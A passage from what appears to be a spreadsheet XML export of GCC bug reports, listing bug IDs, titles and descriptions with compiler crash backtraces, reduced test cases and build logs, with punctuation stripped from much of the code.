0xd21f9d vect_analyze_stmt(gimple* bool* _slp_tree*)
	../../gcc-trunk/gcc/tree-vect-stmts.c:8013
0xd3bd6a vect_slp_analyze_node_operations
	../../gcc-trunk/gcc/tree-vect-slp.c:2219
0xd3bc53 vect_slp_analyze_node_operations
	../../gcc-trunk/gcc/tree-vect-slp.c:2203
0xd3bc53 vect_slp_analyze_node_operations
	../../gcc-trunk/gcc/tree-vect-slp.c:2203
0xd3bc53 vect_slp_analyze_node_operations
	../../gcc-trunk/gcc/tree-vect-slp.c:2203
0xd3cd74 vect_slp_analyze_operations(vec void*)
	../../gcc-trunk/gcc/tree-vect-slp.c:2251
0xd41f10 vect_slp_analyze_bb_1
	../../gcc-trunk/gcc/tree-vect-slp.c:2525
0xd41f10 vect_slp_bb(basic_block_def*)
	../../gcc-trunk/gcc/tree-vect-slp.c:2612
0xd44335 execute
	../../gcc-trunk/gcc/tree-vectorizer.c:759
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$: 
$: cat small.c
int a b g
short c e h i
int f[8]
void fn1() {
  short j
  for ( a) {
    printf(%d g)
    b = 7
    for ( b &gt;= 0 b--) {
      i = 1
      short k = f[b]
      e = k ? k : 3
      j = (i 
      int l = j m = 0
      h = l &gt; m
      f[b] = h
    }
  }
}</t>
  </si>
  <si>
    <t>GCC-44934</t>
  </si>
  <si>
    <t>[4.6 Regression] Bogus Missing format for FORMATTED data transfer</t>
  </si>
  <si>
    <t>Since at least revision 161984 (r158921 works) the test FM411 of the NIST suite fails. The following reduced test shows the problem:
[macbook] f90/bug% cat FM411_red.f
      PROGRAM FM411
      I04 = 8
      ENDFILE I04
      READ (I04)  IVON01
      END
[macbook] f90/bug% gfc FM411_red.f
[macbook] f90/bug% a.out
At line 4 of file FM411_red.f (unit = 8 file = 'fort.8')
Fortran runtime error: Missing format for FORMATTED data transfer</t>
  </si>
  <si>
    <t>GCC-51714</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] internal compiler error: Segmentation fault with -std=c++11</t>
  </si>
  <si>
    <t>Created attachment 26205
Output from /usr/local/google/home/hyounes/gcc-svn-inst/bin/g++ -std=c++11 -c dvlog.cc -save-temps
Command triggering bug:
/usr/local/google/home/hyounes/gcc-svn-inst/bin/g++ -v -std=c++11 -c dvlog.cc -save-temps
(NOTE the bug is not triggered if -std=c++11 is left out)
Compiler output:
Using built-in specs.
COLLECT_GCC=/usr/local/google/home/hyounes/gcc-svn-inst/bin/g++
COLLECT_LTO_WRAPPER=/usr/local/google/home/hyounes/gcc-svn-inst/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /usr/local/google/home/hyounes/gcc-svn/configure --prefix=/usr/local/google/home/hyounes/gcc-svn-inst : (reconfigured) /usr/local/google/home/hyounes/gcc-svn/configure --prefix=/usr/local/google/home/hyounes/gcc-svn-inst
Thread model: posix
gcc version 4.7.0 20111229 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-v' '-std=c++11' '-c' '-save-temps' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/local/google/home/hyounes/gcc-svn-inst/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/cc1plus -E -quiet -v -D_GNU_SOURCE dvlog.cc -mtune=generic -march=x86-64 -std=c++11 -fpch-preprocess -o dvlog.ii
ignoring nonexistent directory /usr/local/google/home/hyounes/gcc-svn-inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/google/home/hyounes/gcc-svn-inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0
 /usr/local/google/home/hyounes/gcc-svn-inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/x86_64-unknown-linux-gnu
 /usr/local/google/home/hyounes/gcc-svn-inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/backward
 /usr/local/google/home/hyounes/gcc-svn-inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/include
 /usr/local/include
 /usr/local/google/home/hyounes/gcc-svn-inst/include
 /usr/local/google/home/hyounes/gcc-svn-inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-std=c++11' '-c' '-save-temps' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/local/google/home/hyounes/gcc-svn-inst/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/cc1plus -fpreprocessed dvlog.ii -quiet -dumpbase dvlog.cc -mtune=generic -march=x86-64 -auxbase dvlog -std=c++11 -version -o dvlog.s
GNU C++ (GCC) version 4.7.0 20111229 (experimental) (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.7.0 20111229 (experimental) GMP version 4.3.2 MPFR version 2.4.2-p1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C++ (GCC) version 4.7.0 20111229 (experimental) (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.7.0 20111229 (experimental) GMP version 4.3.2 MPFR version 2.4.2-p1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 10d42f4b16e2234d346a8379f60d056c
dvlog.cc: In function \u2018void Foo()\u2019:
dvlog.cc:31:34: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>hyounes</t>
  </si>
  <si>
    <t>GCC-12253</t>
  </si>
  <si>
    <t>[tree-ssa] ICE on conversion to std::string inside array initialization</t>
  </si>
  <si>
    <t>This code:
#include 
void x() { std::string test[] = {  } }
Reading specs from
/esat/firenze/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/specs
Configured with: ../../gcc/ssa/configure --prefix=/esat/firenze/install
--program-suffix=-ssa --enable-languages=cc++
Thread model: posix
gcc version 3.5-tree-ssa 20030904 (merged 20030817)
 /esat/firenze/install/libexec/gcc/i686-pc-linux-gnu/3.5-tree-ssa/cc1plus -quiet
-v -D_GNU_SOURCE test.cpp -quiet -dumpbase test.cpp -mtune=pentiumpro -auxbase
test -version -o /tmp/ccRcGZzx.s
ignoring nonexistent directory
/esat/firenze/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /esat/firenze/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/../../../../include/c++/3.5-tree-ssa
 /esat/firenze/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/../../../../include/c++/3.5-tree-ssa/i686-pc-linux-gnu
 /esat/firenze/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/../../../../include/c++/3.5-tree-ssa/backward
 /usr/local/include
 /esat/firenze/install/include
 /esat/firenze/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/include
 /usr/include
End of search list.
GNU C++ version 3.5-tree-ssa 20030911 (merged 20030817) (i686-pc-linux-gnu)
        compiled by GNU C version 3.3.1.
GGC heuristics: --param ggc-min-expand=81 --param ggc-min-heapsize=96541
test.cpp: In function `void x()':
test.cpp:2: internal compiler error: in gimplify_expr at gimplify.c:677
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-83835</t>
  </si>
  <si>
    <t>[7/8 Regression] constexpr constructor rejected in c++17 mode (regression WRT c++14)</t>
  </si>
  <si>
    <t>This code:
```
class X
{
public:
    virtual ~X()
}
class Y
{
private:
    class Z: public X
    {
    private:
        Y const * p_
    public:
        constexpr explicit Z( Y const * p ): p_( p ) {}
    }
    Z z_
public:
    constexpr Y() noexcept: z_( this ) {}
}
int main()
{
}
```
is accepted in C++14 mode and in C++1z mode by g++ 5 or 6 but fails in C++17 mode under g++ 7 or 8 with
```
error: temporary of non-literal type 'Y::Z' in a constant expression
```</t>
  </si>
  <si>
    <t>pdimov</t>
  </si>
  <si>
    <t>GCC-2848</t>
  </si>
  <si>
    <t>Flow mishandles conditional SETs where the mode is wider than a single register</t>
  </si>
  <si>
    <t>When flow is computing conditional register usage for basic
blocks it does not always take into account that a SET 
instruction might be in a mode that utilises more than one
register.
Release:
unknown
Environment:
Red Hat Linux 7.0
How-To-Repeat:
Build an ARM compiler.  Build newlib with -mhard-float enabled.
See the compilation of vfwprintf.c fail.</t>
  </si>
  <si>
    <t>GCC-64507</t>
  </si>
  <si>
    <t>SH inlined builtin strncmp doesn't return 0 for 0 length</t>
  </si>
  <si>
    <t>Created attachment 34386
test case
Thought the check was emitted from the builtin generic prologue like for the constant lengths. which was not :-(</t>
  </si>
  <si>
    <t>GCC-69338</t>
  </si>
  <si>
    <t>incorrect ctor initialization of a flexible array member</t>
  </si>
  <si>
    <t>While working on a fix for bug 69253 I noticed an outstanding problem with flexible array members that I don't think is being tracked yet.  This is most likely post-6.0 material.
G++ accepts but doesn't correctly initialize flexible array members in ctor initializer lists.  5.1 accepts the code below with -fpermissive but eliminates the initialization in all cases.  At least it issues warning: initializer-string for array of chars is too long pointing out the problem.
6.0 accepts the same code even without -fpermissive (this was changed in response to bug 68490) and doesn't issue a diagnostic in any of the four cases.  It gets the aggregate ctor initialization right (again as a result of a fix for bug 68490) but it still discards the initializer in the ctor initializer list.
The ctor initialization should either be rejected if the initialization is not honored or the initializers should be copied.
As a data point Clang rejects everything.
$ cat a.c &amp;&amp; ~/bin/gcc-5.1.0/bin/g++ -Wall -Wextra -Wpedantic -fpermissive a.c &amp;&amp; ./a.out
struct A { char i a[] }
struct A a1 = { 3 AB }                  // wrong in 5 okay in 6
struct A a2 = (struct A){ 3 AB }        // wrong in 5 okay in 6
struct B1 {
    A a3
    B1 (): a3 { 3 AB } { }               // wrong in 5 and 6
} b1
struct B2 {
    A a4
    B2 (): a4 ((struct A){ 3 AB }) { }   // wrong in 5 and 6
} b2
int main ()
{
#define PA(x) \
    __builtin_printf (%i { %i %i %i }\n \
                      x.i x.a[0] x.a[1] x.a[2])
  PA (a1)
  PA (a2)
  PA (b1.a3)
  PA (b2.a4)
}
a.c:1:22: warning: ISO C++ forbids zero-size array â€˜aâ€™ [-Wpedantic]
 struct A { char i a[] }
                      ^
a.c:3:25: warning: initializer-string for array of chars is too long [-fpermissive]
 struct A a1 = { 3 AB }
                         ^
a.c:4:35: warning: ISO C++ forbids compound-literals [-Wpedantic]
 struct A a2 = (struct A){ 3 AB }
                                   ^
a.c:4:35: warning: initializer-string for array of chars is too long [-fpermissive]
a.c: In constructor â€˜B1::B1()â€™:
a.c:8:15: warning: extended initializer lists only available with -std=c++11 or -std=gnu++11
     B1 (): a3 { 3 AB } { }
               ^
a.c:8:25: warning: initializer-string for array of chars is too long [-fpermissive]
     B1 (): a3 { 3 AB } { }
                         ^
a.c: In constructor â€˜B2::B2()â€™:
a.c:13:36: warning: ISO C++ forbids compound-literals [-Wpedantic]
     B2 (): a4 ((struct A){ 3 AB }) { }
                                    ^
a.c:13:36: warning: initializer-string for array of chars is too long [-fpermissive]
3 { 3 0 3 }
3 { 0 3 3 }
3 { 3 0 0 }
3 { 0 0 0 }
$ /home/msebor/build/gcc-trunk-svn/gcc/xgcc -B/home/msebor/build/gcc-trunk-svn/gcc -Wall -Wextra -Wpedantic -fpermissive -xc++ a.c &amp;&amp; ./a.out
a.c:3:25: warning: initialization of a flexible array member [-Wpedantic]
 struct A a1 = { 3 AB }
                         ^
a.c:4:35: warning: ISO C++ forbids compound-literals [-Wpedantic]
 struct A a2 = (struct A){ 3 AB }
                                   ^
a.c:4:35: warning: initialization of a flexible array member [-Wpedantic]
a.c: In constructor â€˜B1::B1()â€™:
a.c:8:25: warning: initialization of a flexible array member [-Wpedantic]
     B1 (): a3 { 3 AB } { }
                         ^
a.c: In constructor â€˜B2::B2()â€™:
a.c:13:36: warning: ISO C++ forbids compound-literals [-Wpedantic]
     B2 (): a4 ((struct A){ 3 AB }) { }
                                    ^
a.c:13:36: warning: initialization of a flexible array member [-Wpedantic]
3 { 65 66 0 }
3 { 65 66 0 }
3 { 3 0 0 }
3 { 0 0 0 }</t>
  </si>
  <si>
    <t>GCC-9462</t>
  </si>
  <si>
    <t>clean up class preparation</t>
  </si>
  <si>
    <t>Currently the class preparation code is a mess.
There are methods which do nearly the same thing
for both the interpreter and for compiled code.
In some situations (see Class.initializeClass) there
is code which short-circuits the normal chain of
events to ensure that vtables are made early enough.
This should all be cleaned up and unified.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-18121</t>
  </si>
  <si>
    <t>[4.0 regression] ICE with array type</t>
  </si>
  <si>
    <t>The following valid code snippet causes a segfault on mainline:
===================================
template struct A
{
    static int const i = 1
}
template struct B
{
    typedef int (*p)[A::i]
}
===================================
According to Phil's regression hunter we have:
: Search converges between 2004-05-11-trunk (#454) and 2004-05-14-trunk (#455).
So this was probably introduced by the tree-ssa merge.</t>
  </si>
  <si>
    <t>GCC-69106</t>
  </si>
  <si>
    <t>std::promise should tolerate overloaded &amp;</t>
  </si>
  <si>
    <t>Test case:
#include 
struct foo {
    void operator
}
int main() {
    std::promise p
    p.set_value(foo())
}
results in:
In file included from prog.cc:1:0:
/usr/local/gcc-head/include/c++/6.0.0/future: In instantiation of 'static std::__future_base::_State_baseV2::_Setter&lt;_Res _Arg _Arg = foo]':
/usr/local/gcc-head/include/c++/6.0.0/future:1081:50:   required from 'void std::promise::set_value(_Res&amp;&amp;) [with _Res = foo]'
prog.cc:9:22:   required from here
/usr/local/gcc-head/include/c++/6.0.0/future:510:49: error: use of deleted function 'void foo::operator&amp;() const'
           return _Setter&lt;_Res _Arg
                                                 ^~~~~~
prog.cc:4:10: note: declared here
     void operator
          ^~~~~~~~</t>
  </si>
  <si>
    <t>GCC-8947</t>
  </si>
  <si>
    <t>Please add a Warning about -malign-double in docs</t>
  </si>
  <si>
    <t xml:space="preserve">    Please add a note in your docs that is not possible to compile
    the GNU-libc (i tried it with 2.3.1) with the options
    -malign-double and/or -m128bit-long-double.
    The increased aligment of long doubles caused by this switches
    crashes the calculations in glibc-2.3.1/io/fts.c
    so every call of one of the stat-functions will fail...
    Thanks
     Norbert Wolff
Release:
3.3 20021214 (experimental)
Environment:
System: Linux icarus 2.4.19 #1 i686
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --with-gnu-ld --with-gnu-as --disable-nls
  -prefix=/opt/gcc3.3 i686-linux</t>
  </si>
  <si>
    <t>GCC-29986</t>
  </si>
  <si>
    <t>testsuite failures</t>
  </si>
  <si>
    <t>All the testsuite failures (except libgomp.c++/ctor-9.C) with Sun as/ld
  http://gcc.gnu.org/ml/gcc-testresults/2006-11/msg00764.html
are of the form:
ld: fatal: relocation error: R_SPARC_TLS_LE_HIX22: file /var/tmp//ccuoqyTO.o:
  symbol : bad symbol type SECT: symbol type must be TLS
It's a Sun ld problem (GNU ld silently groks the same object file) which can
be reproduced with the Sun toolchain:
hikaru% cc -V
cc: Sun C 5.8 Patch 121015-03 2006/10/18
usage: cc [ options] files.  Use 'cc -flags' for details
hikaru% cat t.c
static __thread int i = 1
int main(void)
{
  return i
}
hikaru% cc -S t.c -O
hikaru% cc -o t t.s
ld: fatal: relocation error: R_SPARC_TLS_IE_HI22: file t.o: symbol : bad symbol type SECT: symbol type must be TLS
hikaru% cc -o t t.c -O
hikaru%</t>
  </si>
  <si>
    <t>GCC-47202</t>
  </si>
  <si>
    <t>Endless recursion during mangling</t>
  </si>
  <si>
    <t>Created attachment 22921
test.C
On the attached invalid testcase there is endless recursion during mangling.</t>
  </si>
  <si>
    <t>GCC-6150</t>
  </si>
  <si>
    <t>Bug#107123: Info received and FILED only</t>
  </si>
  <si>
    <t xml:space="preserve"> Thank you for the additional information you have supplied regarding
 this problem report.  It has NOT been forwarded to the developers but
 will accompany the original report in the Bug tracking system.  Please
 ensure that you yourself have sent a copy of the additional
 information to any relevant developers or mailing lists.
 If you wish to continue to submit further information on your problem
 please send it to 107123-quiet@bugs.debian.org as before.
 Please do not reply to the address at the top of this message
 unless you wish to report a problem with the Bug-tracking system.
 Debian bug tracking system administrator
 (administrator Debian Bugs database)
Release:
unknown
Unformatted:
          (was pending/6141: Bug#107123: Info received and FILED only)</t>
  </si>
  <si>
    <t>107123-quiet</t>
  </si>
  <si>
    <t>GCC-12525</t>
  </si>
  <si>
    <t>[tree-ssa] wrong code when using asm with +.</t>
  </si>
  <si>
    <t>For the following example
  #include 
  void f() {
    std::string auxname = 17
    }
the current tree-ssa branch incorrectly warns for gccvs x.cc -c -O1 -Wall:
/gcc-current/bin/../lib/gcc/i386-unknown-freebsd4.8/3.5-tree-ssa/../../../../include/c++/3.5-tree-ssa/i386-unknown-freebsd4.8/bits/atomicity.h:
In function `void f()':
/.amd_mnt/vexpert/files5/sw/freebsd4/gcc-current/bin/../lib/gcc/i386-unknown-freebsd4.8/3.5-tree-ssa/../../../../include/c++/3.5-tree-ssa/i386-unknown-freebsd4.8/bits/atomicity.h:50:
warning: '__tmp' might be used uninitialized in this function</t>
  </si>
  <si>
    <t>GCC-45143</t>
  </si>
  <si>
    <t>[F2008corrig1] Endless loop with unlimited edit descriptor</t>
  </si>
  <si>
    <t>The following is valid according to the F2008 FDIS but it does not make sense and is invalid according the the first rounds of interpretation for F08/0030.
gfortran currently ends in an endless loop for the example:
    print 20
 20 format ( *('a') )
end
As it is a constraint one needs to diagnose it during compilation but should also add it to libgfortran if the string is not checkable.
Cf. http://j3-fortran.org/doc/meeting/193/10-199.txt has for F08/0030
EDITS to 10-007:
[246:15] After C1002 in 10.3.1 add a new constraint:
  C1002A (R1005) An  shall contain at least
                  one data edit descriptor.
The rest of the request seems to be already covered by gfortran's implementation.</t>
  </si>
  <si>
    <t>GCC-59956</t>
  </si>
  <si>
    <t>[4.8 regression] internal compiler error: unexpected expression â€˜P_Sâ€™ of kind template_parm_index</t>
  </si>
  <si>
    <t>Created attachment 31961
repro code
I get the following internal compiler error with g++ 4.8.2 and the attached repro code:
gcc_ice.cpp: In instantiation of â€˜class Fooâ€™:
gcc_ice.cpp:35:28:   required from here
gcc_ice.cpp:28:17: internal compiler error: unexpected expression â€˜P_Sâ€™ of kind template_parm_index
  friend void Bar::impl (const Foo
              ^
This was tested on Arch Linux (x86_64).
$ g++ --version
g++ (GCC) 4.8.2 20131219 (prerelease)</t>
  </si>
  <si>
    <t>chretien</t>
  </si>
  <si>
    <t>GCC-4974</t>
  </si>
  <si>
    <t>Problem to compile nested heritage of templated classes</t>
  </si>
  <si>
    <t>g++ -save-temps bug.cpp
bug.cpp:51: Internal compiler error.
bug.cpp:51: Please submit a full bug report.
bug.cpp:51: See  for instructions.
The file contains:
1. A templated class
2. a class with a templated subclass which is heriting the templated class.
Bug condition:
If the constructor of the subclass is only declared (Non_BUG = 1) the compiler does not cry but the compiler fails if the constructor is defined in the subclass (Non_BUGGY = 0).
Release:
g++ 2.95.3
Environment:
g++ -v
Reading specs from /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.3/specs
gcc version 2.95.3 20010315 (release)
How-To-Repeat:
Run the file</t>
  </si>
  <si>
    <t>freissmannl</t>
  </si>
  <si>
    <t>GCC-58504</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 regression] ICE with type trait as default template parameter</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE since GCC 4.6.0:
=============================================================
template struct A {}
A a
=============================================================
bug.cc:3:3: internal compiler error: in tsubst_copy at cp/pt.c:12809
 A a
   ^
0x5b2723 tsubst_copy
        ../../gcc/gcc/cp/pt.c:12809
0x591061 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc/gcc/cp/pt.c:14738
0x59a4e2 tsubst_expr
        ../../gcc/gcc/cp/pt.c:13628
0x5a755d tsubst_template_arg
        ../../gcc/gcc/cp/pt.c:9235
0x5a3449 coerce_template_parms
        ../../gcc/gcc/cp/pt.c:6802
0x5abc6a lookup_template_class_1
        ../../gcc/gcc/cp/pt.c:7398
0x5abc6a lookup_template_class(tree_node* tree_node* tree_node* tree_node* int int)
        ../../gcc/gcc/cp/pt.c:7695
0x6ad202 finish_template_type(tree_node* tree_node* int)
        ../../gcc/gcc/cp/semantics.c:2856
0x6456c0 cp_parser_template_id
        ../../gcc/gcc/cp/parser.c:13218
0x6458d2 cp_parser_class_name
        ../../gcc/gcc/cp/parser.c:18746
0x63b5ef cp_parser_qualifying_entity
        ../../gcc/gcc/cp/parser.c:5448
0x63b5ef cp_parser_nested_name_specifier_opt
        ../../gcc/gcc/cp/parser.c:5173
0x6462b7 cp_parser_constructor_declarator_p
        ../../gcc/gcc/cp/parser.c:22076
0x6462b7 cp_parser_decl_specifier_seq
        ../../gcc/gcc/cp/parser.c:11313
0x64a1a9 cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:10918
0x64c1b0 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:10867
0x6551ce cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10764
0x653f2d cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10650
0x655806 cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:3939
0x655806 c_parse_file()
        ../../gcc/gcc/cp/parser.c:28893
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-15587</t>
  </si>
  <si>
    <t>Illegal program not detected deferred constants without a completion</t>
  </si>
  <si>
    <t>-- RM 7.4(2)  A deferred constant requires a completion.
package pak1 is
private
   max_speed: constant float        --ERROR: no completion
   upper_bound: constant integer    --ERROR: no completion
   switch: constant boolean         --ERROR: no completion
   true: constant boolean           --ERROR: no completion
   false: constant boolean          --ERROR: no completion
end pak1
$ gnatmake pak1
gcc -c pak1.ads
Compilation finished at Wed Apr 14 18:46:37</t>
  </si>
  <si>
    <t>GCC-25339</t>
  </si>
  <si>
    <t>[4.2 Regression] /usr/bin/ld: Procedure labels require the P' selector</t>
  </si>
  <si>
    <t>/xxx/gnu/gcc-3.3/objdir/./gcc/xgcc -shared-libgcc -B/xxx/gnu/gcc-3.3/objdir/./g
cc -nostdinc++ -L/xxx/gnu/gcc-3.3/objdir/hppa1.1-hp-hpux10.20/libstdc++-v3/src -
L/xxx/gnu/gcc-3.3/objdir/hppa1.1-hp-hpux10.20/libstdc++-v3/src/.libs -B/opt/gnu/
gcc/gcc-4.1.0/hppa1.1-hp-hpux10.20/bin/ -B/opt/gnu/gcc/gcc-4.1.0/hppa1.1-hp-hpux
10.20/lib/ -isystem /opt/gnu/gcc/gcc-4.1.0/hppa1.1-hp-hpux10.20/include -isystem
 /opt/gnu/gcc/gcc-4.1.0/hppa1.1-hp-hpux10.20/sys-include -shared -nostdlib -fPIC
 -Wl+h -Wllibstdc++.sl.6 -Wl+b -Wl/opt/gnu/gcc/gcc-4.1.0/lib -o .libs/libstd
c++.sl.6.7   .libs/bitmap_allocator.o .libs/pool_allocator.o .libs/mt_allocator.
o .libs/codecvt.o .libs/compatibility.o .libs/complex_io.o .libs/ctype.o .libs/d
ebug.o .libs/debug_list.o .libs/functexcept.o .libs/globals_locale.o .libs/globa
ls_io.o .libs/ios.o .libs/ios_failure.o .libs/ios_init.o .libs/ios_locale.o .lib
s/limits.o .libs/list.o .libs/locale.o .libs/locale_init.o .libs/locale_facets.o
 .libs/localename.o .libs/stdexcept.o .libs/strstream.o .libs/tree.o .libs/alloc
ator-inst.o .libs/concept-inst.o .libs/fstream-inst.o .libs/ext-inst.o .libs/io-
inst.o .libs/istream-inst.o .libs/istream.o .libs/locale-inst.o .libs/locale-mis
c-inst.o .libs/misc-inst.o .libs/ostream-inst.o .libs/sstream-inst.o .libs/strea
mbuf-inst.o .libs/streambuf.o .libs/string-inst.o .libs/valarray-inst.o .libs/wl
ocale-inst.o .libs/wstring-inst.o .libs/atomicity.o .libs/codecvt_members.o .lib
s/collate_members.o .libs/ctype_members.o .libs/messages_members.o .libs/monetar
y_members.o .libs/numeric_members.o .libs/time_members.o .libs/basic_file.o .lib
s/c++locale.o .libs/libstdc++.lax/libmath.a/stubs.o .libs/libstdc++.lax/libmath.
a/signbit.o .libs/libstdc++.lax/libmath.a/signbitf.o  .libs/libstdc++.lax/libsup
c++convenience.a/del_op.o .libs/libstdc++.lax/libsupc++convenience.a/del_opnt.o
.libs/libstdc++.lax/libsupc++convenience.a/del_opv.o .libs/libstdc++.lax/libsupc
++convenience.a/del_opvnt.o .libs/libstdc++.lax/libsupc++convenience.a/eh_alloc.
o .libs/libstdc++.lax/libsupc++convenience.a/eh_arm.o .libs/libstdc++.lax/libsup
c++convenience.a/eh_aux_runtime.o .libs/libstdc++.lax/libsupc++convenience.a/eh_
call.o .libs/libstdc++.lax/libsupc++convenience.a/eh_catch.o .libs/libstdc++.lax
/libsupc++convenience.a/eh_exception.o .libs/libstdc++.lax/libsupc++convenience.
a/eh_globals.o .libs/libstdc++.lax/libsupc++convenience.a/eh_personality.o .libs
/libstdc++.lax/libsupc++convenience.a/eh_term_handler.o .libs/libstdc++.lax/libs
upc++convenience.a/eh_terminate.o .libs/libstdc++.lax/libsupc++convenience.a/eh_
throw.o .libs/libstdc++.lax/libsupc++convenience.a/eh_type.o .libs/libstdc++.lax
/libsupc++convenience.a/eh_unex_handler.o .libs/libstdc++.lax/libsupc++convenien
ce.a/guard.o .libs/libstdc++.lax/libsupc++convenience.a/new_handler.o .libs/libs
tdc++.lax/libsupc++convenience.a/new_op.o .libs/libstdc++.lax/libsupc++convenien
ce.a/new_opnt.o .libs/libstdc++.lax/libsupc++convenience.a/new_opv.o .libs/libst
dc++.lax/libsupc++convenience.a/new_opvnt.o .libs/libstdc++.lax/libsupc++conveni
ence.a/pure.o .libs/libstdc++.lax/libsupc++convenience.a/tinfo.o .libs/libstdc++
.lax/libsupc++convenience.a/tinfo2.o .libs/libstdc++.lax/libsupc++convenience.a/
vec.o .libs/libstdc++.lax/libsupc++convenience.a/vterminate.o .libs/libstdc++.la
x/libsupc++convenience.a/cp-demangle.o   -L/xxx/gnu/gcc-3.3/objdir/hppa1.1-hp-hp
ux10.20/libstdc++-v3/src -L/xxx/gnu/gcc-3.3/objdir/hppa1.1-hp-hpux10.20/libstdc+
+-v3/src/.libs -lm ../libmath/.libs/libmath.a -lm ../libsupc++/.libs/libsupc++co
nvenience.a -lm -L/xxx/gnu/gcc-3.3/objdir/./gcc -L/usr/ccs/lib -L/opt/langtools/
lib -L/opt/gnu/gcc/gcc-4.1.0/lib -lgcc_s -lgcc_s -lm -lgcc_s -lgcc_s -lc
/usr/bin/ld: Procedure labels require the P' selector - use the P' selector on c
ode symbol typeinfo for std::logic_error in file .libs/functexcept.o
collect2: ld returned 1 exit status
make[5]: *** [libstdc++.la] Error 1
make[5]: Leaving directory `/xxx/gnu/gcc-3.3/objdir/hppa1.1-hp-hpux10.20/libstdc
++-v3/src'
make[4]: *** [all-recursive] Error 1
I'm fairly certain Richard's large patch to revamp section handling broke
the handling of one-only data on hpux 10 but I'm not sure if this is the
cause of the above error.</t>
  </si>
  <si>
    <t>GCC-46081</t>
  </si>
  <si>
    <t>[4.6 Regression] FAIL: gcc.dg/ipa/ipa-pta-10.c</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 165643 gave
FAIL: gcc.dg/ipa/ipa-pta-10.c scan-ipa-dump pta ESCAPED = { ESCAPED NONLOCAL }
Revision 165636 is OK. It may be caused by revision 165641:
http://gcc.gnu.org/ml/gcc-cvs/2010-10/msg00826.html</t>
  </si>
  <si>
    <t>GCC-67420</t>
  </si>
  <si>
    <t>gfortran.dg/norm2_3.f90 FAILs</t>
  </si>
  <si>
    <t>The gfortran.dg/norm2_3.f90 testcase FAILs on Solaris 12/SPARC (both 32 and 64-bit):
FAIL: gfortran.dg/norm2_3.f90   -O0  execution test
FAIL: gfortran.dg/norm2_3.f90   -O1  execution test
FAIL: gfortran.dg/norm2_3.f90   -O2  execution test
FAIL: gfortran.dg/norm2_3.f90   -O3 -fomit-frame-pointer  execution test
FAIL: gfortran.dg/norm2_3.f90   -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
FAIL: gfortran.dg/norm2_3.f90   -O3 -fomit-frame-pointer -funroll-loops  execution test
FAIL: gfortran.dg/norm2_3.f90   -O3 -g  execution test
FAIL: gfortran.dg/norm2_3.f90   -Os  execution test
Running it under gdb reveals
Program aborted. Backtrace:
#0  0xFF2EEB37
Abort
Program received signal SIGABRT Aborted.
[Switching to Thread 1 (LWP 1)]
0xf2bba064 in __lwp_sigqueue () from /lib/libc.so.1
(gdb) where
#0  0xf2bba064 in __lwp_sigqueue () from /lib/libc.so.1
#1  0xf2b07dc8 in raise () from /lib/libc.so.1
#2  0xf2ad6d14 in abort () from /lib/libc.so.1
#3  0xff2effd8 in _gfortrani_sys_abort ()
    at /vol/gcc/src/hg/trunk/local/libgfortran/runtime/error.c:180
#4  0xff38e35c in _gfortran_abort ()
    at /vol/gcc/src/hg/trunk/local/libgfortran/intrinsics/abort.c:33
#5  0x00011560 in MAIN__ ()
    at /vol/gcc/src/hg/trunk/local/gcc/testsuite/gfortran.dg/norm2_3.f90:28
  Rainer</t>
  </si>
  <si>
    <t>GCC-48845</t>
  </si>
  <si>
    <t>[4.7 regression] All g++.dg/tree-prof and gcc.dg/{matrix tree-prof} executions tests fail on Solaris 8/9</t>
  </si>
  <si>
    <t>Between 20110421 and 20110429 all g++.dg/tree-prof and gcc.dg/{matrix tree-prof}
